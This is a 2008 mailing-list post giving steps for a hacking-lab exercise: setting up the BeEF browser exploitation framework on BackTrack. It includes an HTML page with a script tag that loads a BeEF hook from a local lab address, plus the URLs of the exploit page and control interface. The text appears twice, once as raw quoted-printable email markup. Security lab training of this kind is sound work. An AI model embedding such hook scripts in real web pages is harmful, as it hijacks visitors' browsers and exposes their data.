No subject
Mon Sep 15 13:33:42 MST 2008
Left Corner KDE --> BackTrack -->SetUp BEef=20
Enter a Password
A shell terminal will open:
**************************************************************
BeEF Setup Complete!
The BeEF Interface can be found at:
http://192.168.1.100/beef/ui/
Here is a simple HTML example:
<html>
<title>BeEF Example</title>
<body>BeEF<script src=3D'http://192.168.1.100/beef/hook/'></script>
</body>
</html>
An example of how BeEF can be used in an attack can be found at:
http://192.168.1.100/beef/example.html
More information on BeEF can be found at:
http://bindshell.net/tools/beef/
**************************************************************
Next:
Open your browser to your "BEef" exploit page:
It will look like this URL: http://192.168.1.69/beef/example.html
Open another window to your "BEef UI":
It will look like this URL: http://192.168.1.69/beef/ui/#
Tutorials online show you how:
http://www.bindshell.net/tools/beef//tutorials/modules.html
WARNING: Misuse of any such exploit to gain clipboard information=2C exploi=
t persons=2C stalk=2C harrass or otherwise inflict carniverous torture on t=
hose who TRUSTED your code=2C CAN garner you attention from DHS=2C includin=
g but not limited to phone monitoring=2C Akamai information status=2C and w=
orse. Further=2C coordinated information available from various telecommun=
ications and cable company databases related to complaints for use of such =
tools are resulting in consequences.
Also=2C the evil/good clowns that run the universe do not allow those who m=
isuse their abilities to keep them. =20
http://wapedia.mobi/en/Obnosis | http://en.wiktionary.org/wiki/Citations:o=
bnosis | Obnosis.com (503)754-4452
Laugh at this MSN Footer
_________________________________________________________________
You live life beyond your PC. So now Windows goes beyond your PC.
http://clk.atdmt.com/MRT/go/115298556/direct/01/=
--_b536f79d-f0f0-4d8a-844a-4e733ae28296_
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<html>
<head>
<style>
.hmmessage P
{
margin:0px=3B
padding:0px
}
body.hmmessage
{
FONT-SIZE: 10pt=3B
FONT-FAMILY:Tahoma
}
</style>
</head>
<body class=3D'hmmessage'><div style=3D"text-align: left=3B">Where's the BE=
ef?<br>LAB 10 in PLUG HackFest Series<br>Instructions:<br><br>Boot into Bac=
kTrack KDE <br>From the Menu:<br><span style=3D"font-weight: bold=3B">Left =
Corner KDE -->=3B BackTrack -->=3BSetUp BEef </span><br><br>Enter a Pas=
sword<br><br style=3D"font-weight: bold=3B"><span style=3D"font-weight: bol=
d=3B">A shell terminal will open:</span><br>*******************************=
*******************************<br>BeEF Setup Complete!<br><br>The BeEF Int=
erface can be found at:<br> =3B http://192.168.1.100/beef/ui/<br><br>He=
re is a simple HTML example:<br><br><=3Bhtml>=3B<br><=3Btitle>=3BBe=
EF Example<=3B/title>=3B<br><=3Bbody>=3BBeEF<=3Bscript src=3D'htt=
p://192.168.1.100/beef/hook/'>=3B<=3B/script>=3B<br><=3B/body>=3B=
<br><=3B/html>=3B<br><br>An example of how BeEF can be used in an attac=
k can be found at:<br> =3B http://192.168.1.100/beef/example.html<br><b=
r>More information on BeEF can be found at:<br> =3B http://bindshell.ne=
t/tools/beef/<br>**********************************************************=
****<br><span style=3D"font-weight: bold=3B">Next:</span><br><br>Open your =
browser to your =3B "BEef" exploit page:<br>It will look like this URL:=
 =3B <span style=3D"font-weight: bold=3B">http://192.168.1.69/beef/exam=
ple.html</span><br><br>Open another window to your "BEef UI":<br>It will lo=
ok like this URL: =3B <span style=3D"font-weight: bold=3B">http://192.1=
68.1.69/beef/ui/#</span><br><br>Tutorials online show you how:<br><span sty=
le=3D"font-weight: bold=3B">http://www.bindshell.net/tools/beef//tutorials/=
modules.html</span><br></div><br>WARNING: Misuse of any such exploit to gai=
n clipboard information=2C exploit persons=2C stalk=2C harrass or otherwise=
inflict carniverous torture on those who TRUSTED your code=2C CAN garner y=
ou attention from DHS=2C including but not limited to phone monitoring=2C A=
kamai information status=2C and worse. =3B Further=2C coordinated infor=
mation available from various telecommunications and cable company database=
s related to complaints for use of such tools are resulting in consequences=
.<br><br><span style=3D"font-style: italic=3B">Also=2C the evil/good clowns=
that run the universe do not allow those who misuse their abilities to kee=
p them. =3B</span> <br><br>http://wapedia.mobi/en/Obnosis | =3B htt=
p://en.wiktionary.org/wiki/Citations:obnosis | Obnosis.com (503)754-4452<br=
><hr style=3D"width: 100%=3B height: 2px=3B">Laugh at this MSN Footer<br><b=
r><br /><hr />You live life beyond your PC. So now Windows goes beyond your=
PC. <a href=3D'http://clk.atdmt.com/MRT/go/115298556/direct/01/' target=3D=
'_new'>See how</a></body>
</html>=
--_b536f79d-f0f0-4d8a-844a-4e733ae28296_--
More information about the PLUG-discuss
mailing list